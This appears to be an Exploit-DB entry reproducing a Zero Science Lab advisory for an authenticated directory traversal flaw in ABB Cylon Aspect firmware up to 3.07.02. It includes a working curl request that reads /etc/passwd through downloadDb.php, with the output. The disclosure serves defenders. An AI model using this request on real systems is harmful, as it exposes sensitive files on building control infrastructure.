989122095f
11 changes to exploits/shellcodes/ghdb AppSmith 1.47 - Remote Code Execution (RCE) ollama 0.6.4 - Server Side Request Forgery (SSRF) Vite 6.2.2 - Arbitrary File Read ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) Nagios Log Server 2024R1.3.1 - Stored XSS Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials openSIS 9.1 - SQLi (Authenticated) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure ProSSHD 1.2 - Denial of Service (DOS)
106 lines
No EOL
5.4 KiB
Text
106 lines
No EOL
5.4 KiB
Text
ABB Cylon Aspect 3.07.02 (downloadDb.php) Authenticated File Disclosure
|
|
|
|
|
|
Vendor: ABB Ltd.
|
|
Product web page: https://www.global.abb
|
|
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
|
Firmware: <=3.07.02
|
|
|
|
Summary: ASPECT is an award-winning scalable building energy management
|
|
and control solution designed to allow users seamless access to their
|
|
building data through standard building protocols including smart devices.
|
|
|
|
Desc: The building management system suffers from an authenticated arbitrary
|
|
file disclosure vulnerability. Input passed through the 'file' GET parameter
|
|
through the 'downloadDb.php' script is not properly verified before being used
|
|
to download database files. This can be exploited to disclose the contents of
|
|
arbitrary and sensitive files via directory traversal attacks.
|
|
|
|
Tested on: GNU/Linux 3.15.10 (armv7l)
|
|
GNU/Linux 3.10.0 (x86_64)
|
|
GNU/Linux 2.6.32 (x86_64)
|
|
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
|
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
|
PHP/7.3.11
|
|
PHP/5.6.30
|
|
PHP/5.4.16
|
|
PHP/4.4.8
|
|
PHP/5.3.3
|
|
AspectFT Automation Application Server
|
|
lighttpd/1.4.32
|
|
lighttpd/1.4.18
|
|
Apache/2.2.15 (CentOS)
|
|
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
|
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2024-5831
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php
|
|
|
|
|
|
21.04.2024
|
|
|
|
--
|
|
|
|
|
|
$ cat project
|
|
|
|
P R O J E C T
|
|
|
|
.|
|
|
| |
|
|
|'| ._____
|
|
___ | | |. |' .---"|
|
|
_ .-' '-. | | .--'| || | _| |
|
|
.-'| _.| | || '-__ | | | || |
|
|
|' | |. | || | | | | || |
|
|
____| '-' ' "" '-' '-.' '` |____
|
|
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
|
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
|
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
|
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
|
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
|
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
|
|
|
|
|
$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
|
|
> -H "Cookie: PHPSESSID=xxx"
|
|
root:x:0:0:root:/home/root:/bin/sh
|
|
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
|
bin:x:2:2:bin:/bin:/bin/sh
|
|
sys:x:3:3:sys:/dev:/bin/sh
|
|
sync:x:4:65534:sync:/bin:/bin/sync
|
|
games:x:5:60:games:/usr/games:/bin/sh
|
|
man:x:6:12:man:/var/cache/man:/bin/sh
|
|
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|
|
mail:x:8:8:mail:/var/mail:/bin/sh
|
|
news:x:9:9:news:/var/spool/news:/bin/sh
|
|
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|
|
proxy:x:13:13:proxy:/bin:/bin/sh
|
|
www-data:x:33:33:www-data:/var/www:/bin/sh
|
|
backup:x:34:34:backup:/var/backups:/bin/sh
|
|
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|
|
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|
|
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|
|
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|
|
messagebus:x:999:998::/var/lib/dbus:/bin/false
|
|
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
|
|
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
|
|
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
|
|
sshd:x:995:992::/var/run/sshd:/bin/false
|
|
xuser:x:1000:1000::/home/xuser:
|
|
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
|
|
mysql:x:993:65534::/var/mysql:
|
|
aamtech:x:500:500::/home/aamtech:/bin/sh |